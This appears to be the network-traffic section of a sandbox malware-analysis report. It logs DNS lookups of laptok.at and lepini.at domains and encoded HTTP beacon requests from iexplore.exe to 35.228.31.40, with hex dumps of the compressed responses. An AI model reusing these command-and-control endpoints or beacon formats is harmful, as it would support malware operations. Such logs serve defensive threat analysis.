Feb 10, 2021 15:15:38.287147045 CET	53	57854	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:39.930980921 CET	62026	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:40.490346909 CET	53	62026	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:43.667367935 CET	59453	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:44.307183981 CET	62468	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:44.355885983 CET	53	62468	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:44.677544117 CET	59453	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:45.005522013 CET	53	59453	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:45.007438898 CET	53	59453	8.8.8.8	192.168.2.7
Feb 10, 2021 15:15:48.356102943 CET	52563	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:15:48.669538021 CET	53	52563	8.8.8.8	192.168.2.7
Feb 10, 2021 15:16:08.238946915 CET	54721	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:16:08.292943001 CET	53	54721	8.8.8.8	192.168.2.7
Feb 10, 2021 15:16:09.291835070 CET	54721	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:16:09.343228102 CET	53	54721	8.8.8.8	192.168.2.7
Feb 10, 2021 15:16:10.323930979 CET	54721	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:16:10.351135969 CET	62826	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:16:10.377247095 CET	53	54721	8.8.8.8	192.168.2.7
Feb 10, 2021 15:16:10.412688971 CET	53	62826	8.8.8.8	192.168.2.7
Feb 10, 2021 15:16:12.318151951 CET	54721	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:16:12.371541977 CET	53	54721	8.8.8.8	192.168.2.7
Feb 10, 2021 15:16:14.120670080 CET	62046	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:16:14.120707035 CET	51223	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:16:14.169413090 CET	53	62046	8.8.8.8	192.168.2.7
Feb 10, 2021 15:16:14.171562910 CET	53	51223	8.8.8.8	192.168.2.7
Feb 10, 2021 15:16:14.428504944 CET	63908	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:16:14.485508919 CET	53	63908	8.8.8.8	192.168.2.7
Feb 10, 2021 15:16:15.177875996 CET	49226	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:16:16.193653107 CET	49226	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:16:16.334763050 CET	54721	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:16:16.387345076 CET	53	54721	8.8.8.8	192.168.2.7
Feb 10, 2021 15:16:16.511574030 CET	53	49226	8.8.8.8	192.168.2.7
Feb 10, 2021 15:16:16.602700949 CET	53	49226	8.8.8.8	192.168.2.7
Feb 10, 2021 15:16:17.129333019 CET	60212	53	192.168.2.7	8.8.8.8
Feb 10, 2021 15:16:17.188097000 CET	53	60212	8.8.8.8	192.168.2.7

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Feb 10, 2021 15:15:45.007603884 CET	192.168.2.7	8.8.8.8	d006	(Port unreachable)	Destination Unreachable
Feb 10, 2021 15:16:16.602835894 CET	192.168.2.7	8.8.8.8	d005	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 10, 2021 15:15:39.930980921 CET	192.168.2.7	8.8.8.8	0x6fa7	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 10, 2021 15:15:43.667367935 CET	192.168.2.7	8.8.8.8	0xa34a	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 10, 2021 15:15:44.677544117 CET	192.168.2.7	8.8.8.8	0xa34a	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 10, 2021 15:15:48.356102943 CET	192.168.2.7	8.8.8.8	0xe5f9	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 10, 2021 15:16:10.351135969 CET	192.168.2.7	8.8.8.8	0x66c1	Standard query (0)	c56.lepini.at	A (IP address)	IN (0x0001)
Feb 10, 2021 15:16:14.120670080 CET	192.168.2.7	8.8.8.8	0x5c05	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Feb 10, 2021 15:16:14.120707035 CET	192.168.2.7	8.8.8.8	0xc93a	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Feb 10, 2021 15:16:14.428504944 CET	192.168.2.7	8.8.8.8	0x6dcc	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Feb 10, 2021 15:16:15.177875996 CET	192.168.2.7	8.8.8.8	0xd109	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Feb 10, 2021 15:16:16.193653107 CET	192.168.2.7	8.8.8.8	0xd109	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Feb 10, 2021 15:16:17.129333019 CET	192.168.2.7	8.8.8.8	0xe114	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 10, 2021 15:15:40.490346909 CET	8.8.8.8	192.168.2.7	0x6fa7	No error (0)	api10.laptok.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 10, 2021 15:15:45.005522013 CET	8.8.8.8	192.168.2.7	0xa34a	No error (0)	api10.laptok.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 10, 2021 15:15:45.007438898 CET	8.8.8.8	192.168.2.7	0xa34a	No error (0)	api10.laptok.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 10, 2021 15:15:48.669538021 CET	8.8.8.8	192.168.2.7	0xe5f9	No error (0)	api10.laptok.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 10, 2021 15:16:10.412688971 CET	8.8.8.8	192.168.2.7	0x66c1	No error (0)	c56.lepini.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 10, 2021 15:16:14.169413090 CET	8.8.8.8	192.168.2.7	0x5c05	No error (0)	resolver1.opendns.com	208.67.222.222	A (IP address)	IN (0x0001)
Feb 10, 2021 15:16:14.171562910 CET	8.8.8.8	192.168.2.7	0xc93a	No error (0)	resolver1.opendns.com	208.67.222.222	A (IP address)	IN (0x0001)
Feb 10, 2021 15:16:14.485508919 CET	8.8.8.8	192.168.2.7	0x6dcc	No error (0)	api3.lepini.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 10, 2021 15:16:16.511574030 CET	8.8.8.8	192.168.2.7	0xd109	No error (0)	api3.lepini.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 10, 2021 15:16:16.602700949 CET	8.8.8.8	192.168.2.7	0xd109	No error (0)	api3.lepini.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 10, 2021 15:16:17.188097000 CET	8.8.8.8	192.168.2.7	0xe114	No error (0)	api3.lepini.at	35.228.31.40	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api10.laptok.at

c56.lepini.at

api3.lepini.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49755	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 10, 2021 15:15:40.607914925 CET	5758	OUT	GET /api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lknlxGzswe1f42DY/0ZRJKHiwVKqzREh7F1zZfC/xDcrm70JTSUqg/KfoZXHqy/gtcnRpNm54H7DKUH3incyf7/pb15dMsyWG/BetCueYOwQDaUpKex/cvRYM5W54J_2/F_2BvDZYdxx/C0N9hknbzclgNA/1DbqE0vpldFICv5iJdPAy/ml70ZyZiOpRDJ78b/h5qzpBVY36LCiZe/ZMZBhSfYbmpSZEV5ew/ylnSPhfpP/ctfktke6drAYijwp6R_2/Bn8ddXU HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Feb 10, 2021 15:15:40.996198893 CET	5759	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 10 Feb 2021 14:15:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a c5 b6 ab 40 10 45 3f 88 01 6e 43 dc dd 99 e1 12 dc e1 eb df 7d 2b c3 64 85 a6 bb ea d4 de 21 46 9c f9 c0 0f 1b 8d 23 d0 e9 2a b1 1f 44 19 b6 25 1c f1 73 f9 10 fb 3a 0e 3d 81 57 db 4f 30 81 b4 a1 8e 8f 0c 5e 0b c2 cd d0 bb 28 75 75 f7 ba 30 70 66 83 08 2d 34 0a e9 a8 ae 41 24 3e 9f 0b 88 fe da 35 a6 4f 80 95 2e a0 64 f5 47 f7 6c 2e 26 57 a5 d2 e8 42 de 8e d3 8d ab 42 9f c7 0b 77 87 66 a9 d6 6c 06 f4 9d 5a bd b8 1c 9b 77 9c 16 b1 47 93 53 08 fb fc f5 89 f9 9e d3 3a b2 f9 58 3c f8 5a 5f 7f 7b fa 58 57 0a 61 90 bd 6e a6 de 27 79 12 79 25 3f 14 4c af ca a7 b5 b8 8c 29 74 e1 8e ed b9 28 0e 57 c7 61 f9 23 61 71 b6 a8 5f 7e ac 1c 54 b2 ad 6f 89 43 e7 f3 c6 0f 2d 32 17 9c 48 45 b3 2a 4b f1 eb bf eb a5 a1 32 30 7c 18 54 dc a5 23 21 7a 7e e3 d3 ec b4 73 73 dd bc 86 86 73 6d 84 92 e3 50 a1 4f 0e b6 c1 62 d0 0e 57 89 5c e7 cf 0e 5c b0 29 7f 00 b8 26 b2 5a 23 87 b6 2c b6 9a d9 94 33 c0 f9 7c 42 4a 33 a5 aa 7b 97 95 f0 b1 f6 14 bd 14 b7 a2 38 3d 2c fc 20 e8 9f 01 b3 97 bb 71 f5 c6 49 4d 51 a4 6c 60 0f 3b d5 90 65 3b fa 7f 6f 8a b4 22 5c fa 79 26 60 f7 60 1f 34 3e de 0f 7a 7a 29 c1 f8 9f de 04 40 db 30 86 32 5c 4e 04 e7 64 5b 1c 82 7e 62 4b f2 74 92 16 81 93 5c 45 7c 2b a4 b9 26 6a fb e6 5e 89 e8 62 ea 45 3a be 9e ed 8b c5 79 d0 58 18 04 09 9f d2 12 80 8e 8c 22 f8 c5 f1 01 ac a0 1a ad 4e 0d 92 60 60 e0 2d 4a e8 53 1d 04 cc e3 ca 14 e0 e5 0a 0b 62 02 e9 7c d4 77 97 f2 40 a9 b8 d3 53 8e dd fe 7a bf 5f aa 4a 8e b8 ef 46 b4 91 ea c4 3b 95 40 69 65 84 b0 ee 10 20 13 1c 7e 7c 1a 32 17 b5 55 51 d9 4e 01 b3 4b 24 71 b8 0e f0 fb 5b b7 54 eb 76 d8 6f 7e 37 e9 f9 d6 1f 9f 06 41 8f e3 23 cf fa d1 2b 98 06 65 e9 c3 be be 5a 86 5b 38 1a 2c 8f 19 3c 51 7c 12 a0 4f 3d 25 53 72 a0 64 4f a8 b7 57 1e d6 61 68 42 23 e8 11 50 f1 29 41 25 a1 ae 05 ca 79 c3 3d 91 23 61 46 ea b9 bd 18 84 b6 9e e2 d3 a4 cb f8 c5 fe 86 7a 33 a1 40 15 63 02 b4 7b dc ab 72 c6 83 90 df 81 f5 51 fa 5d 50 d7 90 fe 82 01 1d 71 be 02 b8 6c ca 01 2b 4e 5f 5d 54 71 96 83 81 80 81 88 6b a5 9f 34 e1 47 5b 29 c6 1e 07 ac 94 c3 e4 10 41 97 17 19 71 a2 6f f6 dd 94 3c 58 3d 0e d0 ee 2b e0 17 09 86 76 69 f5 db 10 7a c1 4b 9a 8c 74 4e b1 78 1e eb 8f e1 59 55 20 6f 8d c6 62 6f 18 91 42 ca e1 29 72 e6 95 83 1f 87 85 c2 c2 5a 75 f4 76 df 32 66 ce 48 2f 98 a1 76 97 c1 4c 38 eb 69 f0 d9 a8 52 49 14 c0 df c2 ea 78 45 bf cb bb 26 fb db 10 b0 50 ab e7 b8 ed 46 75 d2 d9 ae dc 72 e1 49 02 39 aa 04 27 ec 67 cb e9 f5 6e 60 02 84 ae f4 38 b9 51 c1 0b 98 6b a0 ba f2 96 e2 5f 6c f4 14 8c 17 5f 3c 43 68 8b 5a 9e af e7 9e 9a 4f fc 18 45 b8 24 50 52 71 b9 9a cb fd 86 46 49 30 15 a4 65 2a 2f 31 d4 e8 c5 d0 35 a5 51 34 66 92 8b d4 3b 8b 3f c5 32 5e 38 2a bc ed 4c b0 ef 0b fc fd c2 da e9 af 59 25 7a 33 87 1c 0c a5 df c4 7d 1a 40 f1 cb 2a a9 e5 ee 4e a8 e9 24 7f bb 41 34 2c c1 91 fb eb e7 17 a0 8e b6 f9 20 e4 1c 4d d7 cf 16 bb 0e b9 1d 7e 4f 0d 0b 92 d0 d4 d1 7f be bb a0 49 d3 cb 21 9f e8 79 b5 bc 5d 7f 5d a1 cd f5 ec 7d d9 f3 f5 d7 48 d2 1e ce 16 62 78 c1 f7 b3 e2 a4 9a ca 4c ba 93 4d 26 98 74 ee 7b 50 4b 52 2c c0 59 c5 5e 58 3e de cc 58 de c9 5f 40 31 0a 35 4b 08 77 4c d8 fb c3 b9 a7 09 45 6f Data Ascii: 2000@E?nC}+d!F#D%s:=WO0^(uu0pf-4A$>5O.dGl.&WBBwflZwGS:X<Z_{XWan'yy%?L)t(Wa#aq_~ToC-2HEK20\|T#!z~sssmPObW\\)&Z#,3\|BJ3{8=, qIMQl`;e;o"\y&``4>zz)@02\Nd[~bKt\E\|+&j^bE:yX"N``-JSb\|w@Sz_JF;@ie ~\|2UQNK$q[Tvo~7A#+eZ[8,<Q\|O=%SrdOWahB#P)A%y=#aFz3@c{rQ]Pql+N_]Tqk4G[)Aqo<X=+vizKtNxYU oboB)rZuv2fH/vL8iRIxE&PFurI9'gn`8Qk_l_<ChZOE$PRqFI0e/15Q4f;?2^8LY%z3}@*N$A4, M~OI!y]]}HbxLM&t{PKR,Y^X>X_@15KwLEo
Feb 10, 2021 15:15:40.996232986 CET	5761	IN	Data Raw: 22 5c 23 0c 4e b3 7a ee 16 96 7d 63 b7 1a 47 3c f6 ad 47 cf 08 0e 72 cc 5d 7c 05 15 ca 37 b3 71 55 6a 54 fa 17 29 ee 8a 19 5d 5e 89 57 91 d7 3f 30 42 bf 38 f0 e0 d7 59 24 51 be 8f f2 3e 7f 14 61 b2 b7 b5 0a a8 dd 1e ce af 27 f6 1b ac e2 d2 84 6c Data Ascii: "\#Nz}cG<Gr]\|7qUjT)]^W?0B8Y$Q>a'lwt![vt)@a,[aq?GjC4Veg'Q<"3F\|kVnLu?\@K)W/"\#MDC]^[fN}t
Feb 10, 2021 15:15:40.996254921 CET	5762	IN	Data Raw: a7 2d 7f f2 45 87 17 dd f8 6e 04 be 73 b4 44 62 69 92 a7 4c de ad cc 5a b1 e5 9f 7a c3 75 32 df c8 e2 c2 e3 b4 9f d0 05 b7 85 27 ef ca 61 3a 0a f2 1f c5 f9 bd 7b c4 0d 46 9b 0e 07 76 7d 2d 0d 6e 0b c1 fb 15 6f 8c 06 51 20 42 ae 0d 3d de 69 dd 36 Data Ascii: -EnsDbiLZzu2'a:{Fv}-noQ B=i6G7\+zDN>ou6AOl+c?QVl_Zhu}/&a9X'[-f\|3*(Kp/%nvmc[v%UMcdG ;=0MpW/ sz
Feb 10, 2021 15:15:40.996273041 CET	5763	IN	Data Raw: d4 e1 aa 2d a3 c8 c4 5f 2b eb dc f0 27 05 68 2d 15 e3 85 13 5b 4f 9d eb 66 1c 9f e3 48 26 95 01 e3 48 5a a6 24 b7 f4 43 cc 46 fb 50 a7 a1 ab 5a 8e d2 cf 48 1e ac c2 75 3d 67 87 0d 39 e5 a6 4d 9b 01 06 a3 dc 9c fa e9 cc e3 fc 8a 10 b9 1a ff 1a 2a Data Ascii: -_+'h-[OfH&HZ$CFPZHu=g9MYS,W7K0:~7<j,))qngOR[1HF'$r5mQ$W?l;p'NihJVAB!P4'G-X"Gy
Feb 10, 2021 15:15:40.996289968 CET	5765	IN	Data Raw: b4 b0 6d bb d9 9e 6a af 42 9c ad 55 dc ab 3b d8 6e 63 80 64 6c 23 b9 b8 e6 b3 5a c0 f3 fe 90 92 0e 36 30 9f 76 e1 c0 43 4a d9 e0 28 31 18 53 5e b5 09 52 c5 37 ad 27 9d 09 ac 6a 39 ad 2b 71 0f 04 d6 c0 f7 c7 32 15 c6 8f 87 c4 fc b1 23 3f da 08 c5 Data Ascii: mjBU;ncdl#Z60vCJ(1S^R7'j9+q2#?=Hf5 IRQ[)hj_CBOefU$ExL)tX5)Po#8w_\_{?I]7bEMYDq=&CbW
Feb 10, 2021 15:15:40.996306896 CET	5766	IN	Data Raw: f7 d6 0d 53 1d 25 93 6e d4 75 a9 b8 1e 17 5f fc 0f 19 5d 42 3d b5 71 b5 4e 9f 8e 89 0a 58 01 01 77 f5 03 09 5e f8 4c ee 9b 26 4b 5c d3 1a b9 d8 44 5e 64 f1 7d f1 f7 df e2 38 85 6f 36 dd 8e af 7a 9f 89 1e c3 b8 76 ab 06 e6 9b 31 b3 99 45 e8 af d1 Data Ascii: S%nu_]B=qNXw^L&K\D^d}8o6zv1E7">A{y$=[f]o<('zzFk;S;0h5M]X?-N]:cEOh2
Feb 10, 2021 15:15:41.035697937 CET	5768	IN	Data Raw: b3 32 3c 88 23 b7 0e 0c 57 09 26 c2 ad ab 6a a7 c8 a4 27 66 cc 13 9b 16 71 96 b1 c6 6b 95 30 60 bd a9 cf 08 fa b5 64 53 4d 2d 0d 20 44 48 49 dc ce fe 05 ec cf 1a 76 29 c6 59 03 f0 c8 e1 6e 6b e3 cc 50 eb 93 93 7d 85 8a be 01 d8 1b fc 18 92 44 1a Data Ascii: 2<#W&j'fqk0`dSM- DHIv)YnkP}Dh0,l}_ra>0D8/-K\X2X\2^7Gh+;(8C{/<DDOIh>>y]KCyyK4@U]K+U>)j.2?7yK!n{kxi
Feb 10, 2021 15:15:41.035742044 CET	5769	IN	Data Raw: bb e3 d7 e2 5e 45 4c 81 7d bb 83 87 18 e3 81 f6 f8 4a a1 10 5a 03 3d 8a 47 a8 c7 f4 e8 06 c1 4b 23 2f 74 e0 d0 e8 37 89 e6 0d 4e 11 ff c5 68 9e 35 c0 6b 29 4e c2 0f 67 ec 9f 30 8e 35 69 87 bd 82 64 39 17 8a f8 98 17 cb 53 86 79 b2 77 66 b5 b3 72 Data Ascii: ^EL}JZ=GK#/t7Nh5k)Ng05id9Sywfr@CyGUzx?L`K:[?e+d,?vH&Z]F^l_y!,Zq\oPr\|r<I0\|1^~@"c,ak_,JB(H6rur$
Feb 10, 2021 15:15:41.035768032 CET	5770	IN	Data Raw: ab 45 a0 c1 d8 2c d6 41 d4 36 ad 81 e5 57 b4 c3 df 5f 26 7b 1d 39 95 25 c7 82 2b 2a 32 9f a6 3c 39 b4 b2 f4 2c e1 14 4d 4b 22 ec c4 4d f9 27 58 41 a3 09 bf e5 ef b4 b1 b5 4b db c0 cd 04 ea 98 3c fe 91 45 f0 03 de 9a 15 6a ce 5b 8e db 5a d9 d7 5d Data Ascii: E,A6W_&{9%+*2<9,MK"M'XAK<Ej[Z]95.'EW?C0]@!]c[2f4UPIO]?Ylg$_vLpS/\|p"&N<h'j^`I~Vrj1em{O'I
Feb 10, 2021 15:15:41.035793066 CET	5772	IN	Data Raw: 2a b0 2e b9 4b d8 58 92 cb f1 f4 46 46 0b 4d 2c f1 e0 1a 9b 39 b1 c3 45 f4 d1 e6 e0 53 ec 2f c1 5c 83 1b b4 88 77 30 3d c9 a3 63 e5 1b d2 9d 32 d7 d7 d5 3a f8 d2 b3 0f 56 61 fc 06 a9 4e 4c d9 fe a5 7e bc af 0b 55 35 72 b6 dc cd 01 50 10 90 a6 bc Data Ascii: *.KXFFM,9ES/\w0=c2:VaNL~U5rP645h/I1zT'{4bFv4H?0`ch]FjF)0C^P44-ezvpI5yfK.n%e/%sbBzkBQYrP#-;eY
Feb 10, 2021 15:15:41.070897102 CET	5773	IN	Data Raw: 7d 0f e0 84 53 be 4c 7e 2d 6e c4 a1 6a 0c ab 67 e3 ca bc 94 91 e4 35 cc 06 3f ff 5e 1c 7e 07 e5 b3 dd 81 4c 8e a9 9a 97 9e 13 05 0a c4 1d b8 11 77 35 4a 55 fe 6b 65 c8 7a ec 1d 6e d8 d6 5c 14 1b 7c ef a5 41 e1 d5 26 52 7c 12 6a 1e 51 55 8f a3 2c Data Ascii: }SL~-njg5?^~Lw5JUkezn\\|A&R\|jQU,8Sm~ }I1htY'^@%+'%aN#\\|SP9HCOS"27gu+.^\|UpA3?g-$(=8IlP)en#yeR7'\|$]!P

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49756	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 10, 2021 15:15:41.612684011 CET	5971	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Feb 10, 2021 15:15:41.697205067 CET	5971	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 10 Feb 2021 14:15:41 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49759	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 10, 2021 15:15:45.113867998 CET	5982	OUT	GET /api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S8BQMDt78kCRWVvFKTW/T3z7jl77vtn31nAs/fsEjsZ1w6_2BM0e/_2B_2BAVLSWZlML2mx/fdFEX0w2l/0RPfFIvYjfZTYoK47bE8/B49X4mtNiudogIoMpOJ/IxyYMxMKBO_2F3ZR_2BAor/8kAylO6X_2Fiq/EdNEwQOa/FYHDMjDZgQLZqSkWO3yLWuc/j3i_2F5QMC/DRHsxypVX90thJgYh/6MpfO8pdNUGy/KOAPjs479Yf/dCe7rPiQO_2FVf/cp_2BP6SlyfefKqn_2BbT/iqLzQdVK/s HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Feb 10, 2021 15:15:45.529711962 CET	5983	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 10 Feb 2021 14:15:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 99 45 92 e3 40 00 04 1f a4 83 98 8e 62 66 d6 4d 64 31 b3 5e bf b3 1f 18 87 bb ab ab 32 3d 17 16 d0 a2 65 fc 7e e6 84 63 91 37 ba 8b 9f 7d 52 69 f6 c2 35 8c 9c db 4a c9 5c 80 e2 03 b2 d0 29 e2 dd 28 1b bf 9b 90 c3 5f bc b0 e8 7e 13 48 5e e2 0e 7a b7 6e 94 07 a6 2f 19 64 c1 1a 4d 78 ad 65 08 24 ca fc cb a3 19 9f b7 eb c0 5f 12 52 c9 71 27 db 0c 62 cd 4f 35 39 ee 74 0a a9 f4 c7 2d c1 20 9b f6 eb 50 06 b1 71 b9 bb 4b 78 71 77 52 8a 05 f5 cd b5 22 99 20 b8 8b 12 42 cb 0f d5 8e 5a 6b 78 a6 f2 85 19 d9 2f 83 b3 3c e4 79 f7 e3 fc a5 29 62 ee 8f ba ad ba c7 1d 78 f6 44 e4 96 07 4a 73 32 9a 50 5b e8 ae c3 86 51 f7 86 be 31 85 ff 7a 7e 9f 00 aa 8f 48 47 56 6e 8b 79 e4 e0 84 b3 9b 1e d0 20 d0 04 30 6c 74 2c ab aa b3 c8 a1 18 d3 b4 0c ce 0f d4 91 93 2e e6 fc 04 fa 88 4c 1a 86 12 53 19 bc 2c ca 97 08 8e a0 ad 76 a4 84 75 97 94 d3 2a b6 48 34 fe 56 cf fa 7a 21 87 92 83 f0 2b 87 05 ba ba c8 97 19 32 bf 88 89 4a 2a a6 05 8b d7 f5 db 9d 72 b2 bf e3 a0 ee 69 e4 09 63 41 27 16 e6 65 04 68 39 99 e8 5c f7 6e b1 c0 b3 2f 1f 8e 1d ab e7 da aa e5 55 20 f7 c9 3c 64 e2 13 2e c8 96 13 b8 49 c5 4c b5 1b 2a bd aa 1b 53 ee d8 5e 18 73 f9 bc a1 83 b3 52 c8 bd 3a 23 63 b6 e0 41 ec 4d be 3a 8d 78 24 72 a2 57 92 4a 57 41 4c 3f 27 b6 76 f5 c3 9f 3c ff c9 4e 0d 1d 43 38 4e 6a 09 b9 e8 a1 c5 3c f1 2c b0 e6 14 fa f0 ac 06 ec d3 37 52 7b 1a 8d 1e 83 c2 a9 13 80 b3 29 86 c4 7e c1 b4 8f 29 35 f9 4e e3 44 56 b1 62 68 e8 91 84 13 9f ff 8a 63 84 4c c7 b9 ad 67 3b 59 2a 5a 78 20 8e f5 00 03 9b 2c f3 5b 3d e1 a5 8c 55 d4 27 74 65 3e 11 ec f9 35 40 d8 e9 dc 7f b0 5e 68 c5 ab 29 a9 70 ae 42 d2 47 2a ae fe a2 5d 5d 0b 00 7f 34 44 3e 71 c8 73 9c 1d d8 13 c4 0e 24 24 6a 0b fa dc 1a 07 0c 4d 61 da 02 a3 62 7b bb 3e b5 b3 f3 bb 17 41 aa 46 f4 8f c3 9d 1e ae 82 9e bc 5a ea 50 dd 51 47 0d 17 15 96 d7 aa 1a c4 7a 1d 37 55 64 17 4c 54 05 ba ac 7b 7d 05 d3 5b d6 79 18 83 fe 6e 31 14 8a 3d 26 c1 e8 c8 67 cb 1d e1 c8 01 fa 43 74 19 7d 81 b1 4e 3e 0b b3 cc 2d 2d a2 fa 92 c3 70 88 50 38 70 e1 24 3e 67 d7 65 4c 6b 68 a7 b8 b2 17 99 23 2b 1e 98 7d 6d 81 6a d3 ca ad ec d7 96 6b f5 2f fc 0c 3c b0 74 ba 79 3c 9b ef 10 ec 05 e7 14 fa 50 71 46 d8 ea d7 8a 1c 88 4c 39 71 23 ee f5 a5 92 25 b3 78 b0 38 a1 51 33 07 80 b6 bd f4 87 db 93 72 eb 9d a9 f0 28 b2 3a 48 c0 24 d1 7e 64 e2 01 02 65 15 a7 01 25 9a 0d 5a 4c 6e 54 6b c0 41 bc 16 4b a3 86 7c 33 a6 12 63 4d 19 d3 2a aa 03 5a e1 3a af 83 b3 00 b4 8e 40 ab 44 d2 79 6b 6d c6 5a 4d e8 12 35 0b 57 9b 1c 92 e1 b5 74 b1 9b ca 59 c3 21 81 71 03 4c e0 ab d9 96 03 24 c5 85 48 c6 7a 7b 84 e9 c5 b9 c0 95 c5 3b 6c 96 32 a5 93 6b 22 5d 32 04 99 b2 ec 8a df 3c e6 54 fd c6 8c 13 3c 37 78 33 d8 03 bd 83 6e 19 61 c8 52 08 a1 48 1c 52 61 e4 27 2d 94 5c c7 08 d7 e2 94 f2 6d 3a 86 23 0b 66 6b 6f 6e 51 97 ba 54 dc c5 9d 09 4b 4d 2a c7 48 54 68 c8 bc cf 95 07 77 63 8f 3f e0 13 53 fc d8 c2 9b ad be 69 e9 e1 79 a1 b9 19 08 33 4e c9 b3 32 b9 9f e5 b3 45 a3 54 93 7f 46 8d 41 bc 37 18 e3 dc 93 ba 95 26 40 17 ca 2b 7b e6 aa ba 82 42 f8 05 a5 b2 25 7c 1c e0 ef 9a 14 b5 bd 02 f6 5c 6c 62 17 78 3c a8 aa 50 e7 2c 61 2b 27 3a dd c3 b8 1a f4 25 7a 31 05 a1 Data Ascii: 2000E@bfMd1^2=e~c7}Ri5J\)(_~H^zn/dMxe$_Rq'bO59t- PqKxqwR" BZkx/<y)bxDJs2P[Q1z~HGVny 0lt,.LS,vuH4Vz!+2JricA'eh9\n/U <d.ILS^sR:#cAM:x$rWJWAL?'v<NC8Nj<,7R{)~)5NDVbhcLg;YZx 